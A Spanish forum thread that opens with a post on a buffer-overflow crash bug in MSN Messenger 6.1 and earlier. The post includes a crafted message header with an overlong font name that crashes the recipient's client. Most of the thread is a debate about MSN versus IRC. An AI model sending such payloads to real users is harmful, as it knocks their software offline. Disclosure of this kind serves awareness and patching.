Fallo de seguridad en Msn Messenger

[DarkByte]

Hace poco (dos o tres semanas) se descubrió una falla de seguridad en el Msn. Ya se ha pedido a todos los usuarios que actualicen su msn. Aún así hay gente que no lo ha hecho. Esta falla afecta a los usuarios de la versión 6.1 hacia abajo y ha aparecido junto a otra falla que permitiría la ejecución de programas en el pc de la víctima.

Pongo aquí el exploit del fallo primero, que provoca la caída del usuario que lo recibe. El bug consiste en hacer un desbordamiento de buffer al enviar un mensaje con fuente formateada, al enviarle una cadena larga que provoca el desbordamiento y la caida del msn atacado.

Lo explico más detenidamente:Este es el encabezado normal de envio de mensajes:

Código:

MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; 
PF=22

Esto indica que el mensaje tiene vuestro tipo de letra y color.Donde está la falla en el programa si le metes una cadena larga como esta:

Código:

MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20New%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
0%20%20%20%20%20Roman%20%20%20%20%20%20%20%20%2
0%20%20; EF=B; CO=ff; CS=0; PF=22

Lo aquí expuesto es para el conocimiento de los demás, no para su explotación y provecho. En resumen: Sólo para aprender y adquirir conocimiento, no para perrear.

[madman]

Quien usa el MSN Messenger cuando existe el aMSN

[[__hector]]

I do .

[DarkByte]

Pues yo... Kopete!!, en serio, me parece mejor que el Alvaro Messenger y lo que anda por ahí... ahora mismito voy a poner un tema en debates para ver que sale del tema.

[Julián]

Usar el MSN existiendo el IRC me parece propio de gente desinformada.
Y al que diga eso de "es que mis 'contactos' usan el msn" le digo que eso no tiene ningún sentido, por ejemplo, yo tengo 'contactos' y saben que estoy en el IRC y si alguno me dice que el "usa el MSN" le enseño a usar el irc, y si no le interesa será porque tampoco necesitará nada de mí.
Y si el que me dice eso es mi jefe o un cliente, le digo: "jefe, mas te vale desinstalar el MSN, a no ser que no te importe que cualquiere pueda leer tus conversaciones".

Ojo: donde he escrito "gente desinformada" podría haber escrito "ignorantes" pero he preferido ser un poco moderado

he dicho

[DarkByte]

¿Y con Irc no?, yo veo Irc el doble de inseguro que Msn... yo de Msn conozco dos fallos... y eso (y esoo!!!) que es de M$, pero de Irc conozco... puagh... existen montones... Messenger, sea cual sea el propietario, es un gran avance, pues te permite tener una lista de contactos y poder bloquear a tu gusto no estando a la vista de todos tu dirección Ip.

Además... ¿Puedes usar la webcam con irc?¿Puedes echarte una partidita al Buscaminas?¿Puedes escribir emoticonos?¿Hay algún "Messenger Plus!" (una muy buena extensión para Msn Messenger) para Irc?¿Hay nicks largos en irc?¿Tienes lista de contactos en irc o tienes que esperar a que se conecten a un canal?¿Puedes enviar un mensaje al móvil desde irc?¿Puedes ponerte "Estoy comiendo" o sólo en Ausente?¿Tiene fondo de ventana el irc?¿Puedes poner grupos a los canales en Irc?

Si se puede... no lo sabía.

[[__hector]]

mm, casi debate.

Yo solo argumento que detras de cualquier firewall empresarial, es sumamente extraño que los puertos de IRC esten abiertos, no asi messenger (es mi caso en los ultimos 3 trabajos que he tenido). Claro, que uso proxys externos, hopster y otras diabluras, pero eso soy yo como informatico. La gente promedio, de quienes hay unos cuantos en mi lista, no lograrian hacerlo sin ayuda.

[kinobi]

Hola,

Cita:

Empezado por DarkByte

¿Y con Irc no?, yo veo Irc el doble de inseguro que Msn...

Y, ¿cuál es el argumento para esa afirmación?

Cita:

Empezado por DarkByte

yo de Msn conozco dos fallos... y eso (y esoo!!!) que es de M$, pero de Irc conozco... puagh... existen montones...

Me temo que confundes un protocolo (IRC: RFC 1459) con los clientes que se usan en determinadas plataformas (p. ej. MS) para ese protocolo.

Cita:

Empezado por DarkByte

Messenger, sea cual sea el propietario, es un gran avance, pues te permite tener una lista de contactos y poder bloquear a tu gusto no estando a la vista de todos tu dirección Ip.

Eso depende del cliente que utilices para comunicarte con IRC. Por tener, puedes tener listas de "amigos", listas "negras", ocultación de IP (depende del servidor)...

Cita:

Empezado por DarkByte

Además... ¿Puedes usar la webcam con irc?

¿Es necesario utilizar MSN para utilizar la webcam?

Cita:

Empezado por DarkByte

¿Puedes echarte una partidita al Buscaminas?

¿Es necesario utilizar MSN para echar una partida al Buscaminas o similares?

Cita:

Empezado por DarkByte

¿Puedes escribir emoticonos?

Desde luego.

Cita:

Empezado por DarkByte

¿Hay algún "Messenger Plus!" (una muy buena extensión para Msn Messenger) para Irc?

De nuevo creo que confundes un protocolo con los clientes que utiliza ese protocolo.

Cita:

Empezado por DarkByte

¿Hay nicks largos en irc?

Sí, depende del servidor.

Cita:

Empezado por DarkByte

¿Tienes lista de contactos en irc o tienes que esperar a que se conecten a un canal?

Sí. Contestada anteriormente.

Cita:

Empezado por DarkByte

¿Puedes enviar un mensaje al móvil desde irc?

¿Es necesario utilizar MSN para enviar mensajes a móviles?

Cita:

Empezado por DarkByte

¿Puedes ponerte "Estoy comiendo" o sólo en Ausente?

Sí

Cita:

Empezado por DarkByte

¿Tiene fondo de ventana el irc?

¿Puedes utilizar tu MSN en un entorno NO gráfico? Sí existen clientes IRC para terminales tipo "consola" (no gráficos).

Cita:

Empezado por DarkByte

¿Puedes poner grupos a los canales en Irc?

No entiendo. Imagino que eso es terminología MSN.

Ahora pregunto yo:

¿Puedes (en MSN) crear canales protegidos, restringidos, cifrados, moderados, con acceso por invitación y sólo para oyentes... y todo ello bajo un protocolo estándar no sujeto a una plataforma o sistema operativo particular?

Saludos.

[Julián]

Y a lo que dice kinobi yo añado:

A nadie le importa si "Julian esta escribiendo un mensaje" o si "Julian ha cerrado la ventana" o si "Julian le ha borrado de la lista de contactos"

De verdad que la unica excusa que teneis quienes usais ese engendro (u otros similares) es la falta de información, pues si, por ejemplo DarkByte (y muchos otros) conociera lo suficiente del protocolo IRC, estoy completamente seguro de que se pondía un cliente de IRC y les diría a "sus contactos" como usarlo.

Y todo eso por no hablar del hecho de que cuando usas el MSN estas comportandote como un obediente borrego del pastor BillGey.

¡saludos!

[Julián]

Cita:

Empezado por hector

Yo solo argumento que detras de cualquier firewall empresarial, es sumamente extraño que los puertos de IRC esten abiertos, no asi messenger

Eso no es problema, pues tiene 2 soluciones, una fácil y otra menos:

La menos fácil: hacer tunneling con el putty.
La fácil: http://www.irc-hispano.org/

Amos, quel que no se conecta al irc es por no quiere.

[__marcsc]

Cita:

Empezado por kinobi

¿Es necesario utilizar MSN para utilizar la webcam?
¿Es necesario utilizar MSN para echar una partida al Buscaminas o similares?
¿Es necesario utilizar MSN para enviar mensajes a móviles?

Me parece una postura un poco rídigda. Desde luego no es necesario, pero el hecho de que lo integre como opción puede ser de utilidad para algunos.

Es necesario que un teléfono móvil haga fotos? No. Puede ser útil? Sí .Otra cosa es que el marketing quiera hacerte creer que es necesario que un teléfono haga fotos

Cita:

Empezado por kinobi

De nuevo creo que confundes un protocolo con los clientes que utiliza ese protocolo.

Bueno, creo que es un abuso de lenguaje que ha hecho para venir a decir que aun usando IRC, dependes de clientes que tienen o pueden tener vulnerabilidades y que es difícil encontrar clientes que tengan una interfaz gráfica tan bonita o con tantas utilidades como tiene MSN o alguno de sus add-on.

Cita:

Empezado por Julián

A nadie le importa si "Julian esta escribiendo un mensaje" o si "Julian ha cerrado la ventana" o si "Julian le ha borrado de la lista de contactos"

Que a ti no te importe no significa que a otros no pueda importarles.

Cita:

Empezado por Julián

De verdad que la unica excusa que teneis quienes usais ese engendro (u otros similares) es la falta de información

Creo cometes el error de suponer que todo el mundo tiene tus mismas necesidades, prioridades o manías. Me recuerda a cuando visitaba cierto foro de cine y los defensores de Matrix Reloaded (en mi opinión un aborto de peli ) decían a los detractores:

"Si no te gusta la peli es porqué no la has entendido en su totalidad"



Este tipo de afirmaciones suelen ser peligrosas y no llevan a ninguna parte. Las habré oido mil veces en referencia a cualquier tema... política, finanzas, arte... A veces hay cosas que no admiten respuestas categóricas.

Cita:

Empezado por Julián

Y todo eso por no hablar del hecho de que cuando usas el MSN estas comportandote como un obediente borrego del pastor BillGey.

Bueno, a mi eso no me importa lo más mínimo... de hecho, me gustan la mayoría de los productos de MS...

Saludos!

[DarkByte]

Cita:

Empezado por kinobi

¿Puedes (en MSN) crear canales protegidos, restringidos, cifrados, moderados, con acceso por invitación y sólo para oyentes... y todo ello bajo un protocolo estándar no sujeto a una plataforma o sistema operativo particular?

Puedes invitar a gente a una conversación múltiple, esto estaría protegido y restringido de que no entrara nadie externo, y con addon's puedes hacer que se cifren los datos y, messenger (msn) está para múltiples plataformas.

Además, he dicho msn por poner un messenger (el más extendido, creo), pero también prefiero el yahoo messenger a irc para usarlo para comunicarme con una persona. Eso sí, hay veces que necesito IRC.

Julián, tu respuesta me ha parecido un poco egoista y egocéntrica. No todos somos como tú. Yo tengo mi novia en otra ciudad y necesito estar en contacto diario con ella... ¿Sería lo mismo ver sus letras, las de una máquina, a oirla y verla con una conversación con voz y webcam?. No digo que irc sea malo, me encanta, y también he trabajado con el protocolo (he hecho varias pruebas de cliente irc).

Creo que se trata de las prestaciones de cada servicio. Además, ¿tenemos que elegir entre Msn o Irc?. Yo personalmente uso los dos.

Yo, como Marcs, utilizo Msn Messenger por sus prestaciones, no por la empresa que lo mantiene.

Post 999: Viendo los pros y los contras de cada protocolo... un post más y soy milenario...

[kinobi]

Hola,

Cita:

Empezado por marcsc

Me parece una postura un poco rídigda. Desde luego no es necesario, pero el hecho de que lo integre como opción puede ser de utilidad para algunos.

Tal vez fui demasiado críptico. Nada impide añadir a un cliente de IRC esas funcionalidades (algunas dentro del protocolo y otras fuera).

Cita:

Empezado por marcsc

Bueno, creo que es un abuso de lenguaje que ha hecho para venir a decir que aun usando IRC, dependes de clientes que tienen o pueden tener vulnerabilidades y que es difícil encontrar clientes que tengan una interfaz gráfica tan bonita o con tantas utilidades como tiene MSN o alguno de sus add-on.

Pero eso de la interfaz gráfica tan bonita es muy subjetivo. Personalmente, encuentro eso que llaman el look & feel de Windows (y de las aplicaciones que en él se ejecutan) poco atractivo.

En cuanto a las utilidades integradas, es también un tema subjetivo. No me gusta la tendencia que tiene MS a integrar funcionalidades en las aplicaciones. Reconozco que hace muchos años que me cautivo el "estilo mecano" de Unix. Si quiero una aplicación para comunicarme con mis amigos, la quiero sólo para eso y me sobra el que también me prepare el café por las mañanas.

Saludos.

[kinobi]

Hola,

Cita:

Empezado por DarkByte

Puedes invitar a gente a una conversación múltiple, esto estaría protegido y restringido de que no entrara nadie externo, y con addon's puedes hacer que se cifren los datos y,

Nada impide crear ampliaciones (addon's) a clientes IRC (o crearte tu propio cliente de IRC si no hay ninguno que te guste, para eso el protocolo es abierto) para añadir las funcionalidades que sean necesarias.

Cita:

Empezado por DarkByte

messenger (msn) está para múltiples plataformas.

Hasta lo que yo sé (puedo estar equivocado), MSN (tomado como cliente) está disponible sólo para plataformas MS. Otro asunto es que desde otros clientes se pueda acceder a la red MSN.

Saludos.

[DarkByte]

Pues a mi no me vendría mal que me preparase tostadas.... verdad, marcsc?

[kinobi]

Cita:

Empezado por DarkByte

Pues a mi no me vendría mal que me preparase tostadas.... verdad, marcsc?

El problema de una herramienta que ofrece muchas funcionalidades es el aumento del consumo de recursos y, en el caso de una herramienta de red como los clientes de mensajería instantánea, abrir más puertas a posibles vulnerabilidades.

Saludos.

[__marcsc]

Hola,

Cita:

Empezado por kinobi

Tal vez fui demasiado críptico. Nada impide añadir a un cliente de IRC esas funcionalidades (algunas dentro del protocolo y otras fuera).

Entiendo, sin embargo, el hecho que MSN los integre y los clientes más populares de IRC no (corregidme si me equivoco), puede inclinar la balanza a favor de M$.

Cita:

Empezado por kinobi

Pero eso de la interfaz gráfica tan bonita es muy subjetivo. Personalmente, encuentro eso que llaman el look & feel de Windows (y de las aplicaciones que en él se ejecutan) poco atractivo.

Desde luego, de hecho ese era un poco el objeto de mi post anterior, son cosas muy subjetivas. A mi personalmente el tema por defecto de Windows XP me parece feísimo, y lo pongo con look 2000. Sin embargo creo que la mayoría de usuarios de XP lo prefieren.

Cita:

Empezado por kinobi

En cuanto a las utilidades integradas, es también un tema subjetivo. No me gusta la tendencia que tiene MS a integrar funcionalidades en las aplicaciones.

Una vez más ese era el propósito, es una tendencia que, individualmente, puede gustar o no. Sin embargo, es un motivo válido a tener en cuenta.

Cita:

Empezado por kinobi

Reconozco que hace muchos años que me cautivo el "estilo mecano" de Unix. Si quiero una aplicación para comunicarme con mis amigos, la quiero sólo para eso y me sobra el que también me prepare el café por las mañanas.

Pero eso también es subjetivo, habrá quien estará encantado con ese café

Saludos!

[DarkByte]

Cita:

Empezado por marcsc

habrá quien estará encantado con ese café

Y la tostada???

[__marcsc]

Cita:

Empezado por DarkByte

Y la tostada???

Ummmm... pues yo tengo un programa cojonudo para hacer tostadas, se llama Nero o algo así, te suena?

Eso sí, paso de mermelada o mantequilla, que luego se cae al suelo por el lado de Murphy...

[[__hector]]

Nota al pie de pagina.

Intente conectarme a irc-hispano.org, pero durante toda la tarde me dio connection timeout (no encontre el website). Como no lo probe solo pregunto, ¿no usa applets? ¿javascript? Si son applets, ya he visto otros clientes irc-web, y necesitan igual lo de los puertos. Aunque irc y messenger son "medios de comunicacion" (si asi podrian llamarse), creo que cada uno tiene sus pros y contras, y quizas todas las cosas que se logran en messenger podrian implementarse en irc pero... no estan implementadas (al menos no en los clientes que recuerdo haber usado algun tiempo atras).

Por cierto, que la integracion de nimiedades como webcam y voz cuenta mucho para el usuario promedio. Es por ese tipo de usuario por el que abogo, porque no todos los que estan en mi lista puedo pedirles que hagan tunneling con el putty o hopster, y menos que abran tres aplicaciones mas para integrar lo que ya una trae integrada por si misma.